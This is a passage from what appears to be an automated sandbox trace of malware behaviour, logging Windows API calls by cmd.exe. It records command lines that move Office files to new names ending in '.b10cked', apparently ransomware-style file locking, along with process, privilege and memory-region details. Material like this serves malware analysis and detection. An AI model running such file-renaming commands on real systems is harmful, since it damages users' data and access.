lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.476] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0173.476] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0173.476] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0173.476] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0173.476] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0173.476] _wcsicmp (_String1="move", _String2="CD") returned 10 [0173.476] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0173.476] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0173.476] _wcsicmp (_String1="move", _String2="REN") returned -5 [0173.476] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0173.476] _wcsicmp (_String1="move", _String2="SET") returned -6 [0173.476] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0173.477] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0173.477] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0173.477] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0173.477] _wcsicmp (_String1="move", _String2="MD") returned 11 [0173.477] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0173.477] _wcsicmp (_String1="move", _String2="RD") returned -5 [0173.477] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0173.477] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0173.477] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0173.477] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0173.477] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0173.477] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0173.477] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0173.477] _wcsicmp (_String1="move", _String2="VER") returned -9 [0173.477] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0173.477] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0173.477] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0173.477] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0173.477] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0173.477] _wcsicmp (_String1="move", _String2="START") returned -6 [0173.477] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0173.477] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0173.477] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0173.478] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.478] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.478] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f60c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f604, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f604*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0173.479] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0173.479] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0173.479] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0173.479] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0173.479] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0173.479] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0173.479] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0173.503] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0173.503] _wcsicmp (_String1="PUBWZI~1.TRX", _String2=".") returned 66 [0173.503] _wcsicmp 
(_String1="PUBWZI~1.TRX", _String2="..") returned 66 [0173.503] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pubwzi~1.trx")) returned 0x2020 [0173.503] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x361f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.503] SetErrorMode (uMode=0x0) returned 0x0 [0173.503] SetErrorMode (uMode=0x1) returned 0x0 [0173.503] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX", nBufferLength=0x104, lpBuffer=0x18ef94, lpFilePart=0x18ef7c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX", lpFilePart=0x18ef7c*="PUBWZI~1.TRX") returned 0x3c [0173.503] SetErrorMode (uMode=0x0) returned 0x1 [0173.503] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0173.503] _wcsicmp (_String1="PUBWZI~1.TRX", _String2=".") returned 66 [0173.503] _wcsicmp (_String1="PUBWZI~1.TRX", _String2="..") returned 66 [0173.503] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pubwzi~1.trx")) returned 0x2020 [0173.504] SetErrorMode (uMode=0x0) returned 0x0 [0173.504] SetErrorMode (uMode=0x1) returned 0x0 [0173.504] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX", nBufferLength=0x104, lpBuffer=0x18f410, lpFilePart=0x18f1a8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX", lpFilePart=0x18f1a8*="PUBWZI~1.TRX") returned 0x3c [0173.504] SetErrorMode (uMode=0x0) returned 0x1 [0173.504] SetErrorMode (uMode=0x0) returned 0x0 [0173.504] SetErrorMode (uMode=0x1) returned 0x0 [0173.504] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18f618, lpFilePart=0x18f1a8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked", lpFilePart=0x18f1a8*="PUBWZINT.REST.trx_dll.b10cked") returned 0x4d [0173.504] SetErrorMode (uMode=0x0) returned 0x1 [0173.504] SetLastError (dwErrCode=0x0) [0173.504] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pubwzint.rest.trx_dll.b10cked")) returned 0xffffffff [0173.504] GetLastError () returned 0x2 [0173.504] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x18eb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb24) returned 0x362138 [0173.504] FindNextFileW (in: hFindFile=0x362138, lpFindFileData=0x18eb24 | out: lpFindFileData=0x18eb24) returned 0 [0173.505] GetLastError () returned 0x12 [0173.505] FindClose (in: hFindFile=0x362138 | out: hFindFile=0x362138) returned 1 [0173.506] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x361cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x361cc8) returned 0x362138 [0173.506] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18edbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0173.506] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x18edbc, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0173.506] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pubwzint.rest.trx_dll")) returned 0x2020 [0173.506] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pubwzint.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pubwzint.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0173.507] FindClose (in: hFindFile=0x362138 | out: hFindFile=0x362138) returned 1 [0173.507] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18ed70 | out: _Buffer=" 1") returned 9 [0173.507] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.507] GetFileType (hFile=0x7) returned 0x2 [0173.507] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.507] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18ecfc | out: lpMode=0x18ecfc) returned 1 [0173.507] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.507] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18ed30 | out: lpConsoleScreenBufferInfo=0x18ed30) returned 1 [0173.507] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0173.508] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18ed70 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0173.508] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x18ed54, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18ed54*=0x1a) returned 1 [0173.508] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.508] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.508] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.508] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.508] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.508] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.508] SetConsoleInputExeNameW () returned 0x1 [0173.508] GetConsoleOutputCP () returned 0x1b5 [0173.508] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.508] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.509] exit (_Code=0) Process: id = "302" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ee0" os_pid = "0x8a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23590 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23591 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23592 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23593 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 23594 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23595 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23596 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23597 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23598 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 23599 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23742 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23743 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23744 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23745 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 23746 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 23747 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23748 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23749 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23750 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23751 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23752 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23753 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23754 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23755 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23756 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 23757 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23758 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23759 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 23760 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 23761 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 23762 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 23763 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 23764 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 23765 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000011d0000" filename = "" Thread: id = 401 os_tid = 0x954 [0173.560] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fb3c | out: lpSystemTimeAsFileTime=0x26fb3c*(dwLowDateTime=0x9d5a23c0, dwHighDateTime=0x1d440a9)) [0173.560] GetCurrentProcessId () returned 0x8a8 [0173.560] GetCurrentThreadId () returned 0x954 [0173.560] GetTickCount () returned 0x32876 [0173.560] QueryPerformanceCounter (in: lpPerformanceCount=0x26fb34 | out: lpPerformanceCount=0x26fb34*=23034899796) returned 1 [0173.561] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0173.561] __set_app_type (_Type=0x1) [0173.561] __p__fmode () returned 0x76b331f4 [0173.561] __p__commode () returned 0x76b331fc [0173.561] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0173.561] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0173.561] GetCurrentThreadId () returned 0x954 [0173.561] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x954) returned 0x38 [0173.561] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.561] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0173.561] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.562] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0173.562] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26facc | out: phkResult=0x26facc*=0x0) returned 0x2 [0173.562] VirtualQuery (in: lpAddress=0x26fb03, lpBuffer=0x26fa9c, dwLength=0x1c | out: lpBuffer=0x26fa9c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.562] VirtualQuery (in: 
lpAddress=0x170000, lpBuffer=0x26fa9c, dwLength=0x1c | out: lpBuffer=0x26fa9c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0173.562] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fa9c, dwLength=0x1c | out: lpBuffer=0x26fa9c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0173.562] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fa9c, dwLength=0x1c | out: lpBuffer=0x26fa9c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.562] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fa9c, dwLength=0x1c | out: lpBuffer=0x26fa9c*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0173.562] GetConsoleOutputCP () returned 0x1b5 [0173.562] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.562] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0173.562] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.562] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0173.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.563] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.563] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.563] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.563] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.563] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.563] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0173.563] GetEnvironmentStringsW () returned 0x350210* [0173.563] 
FreeEnvironmentStringsW (penv=0x350210) returned 1 [0173.564] GetEnvironmentStringsW () returned 0x350210* [0173.564] FreeEnvironmentStringsW (penv=0x350210) returned 1 [0173.564] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ea3c | out: phkResult=0x26ea3c*=0x40) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x0, lpData=0x26ea48*=0xa0, lpcbData=0x26ea40*=0x1000) returned 0x2 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x4, lpData=0x26ea48*=0x1, lpcbData=0x26ea40*=0x4) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x0, lpData=0x26ea48*=0x1, lpcbData=0x26ea40*=0x1000) returned 0x2 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x4, lpData=0x26ea48*=0x0, lpcbData=0x26ea40*=0x4) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x4, lpData=0x26ea48*=0x40, lpcbData=0x26ea40*=0x4) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x4, lpData=0x26ea48*=0x40, lpcbData=0x26ea40*=0x4) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x0, 
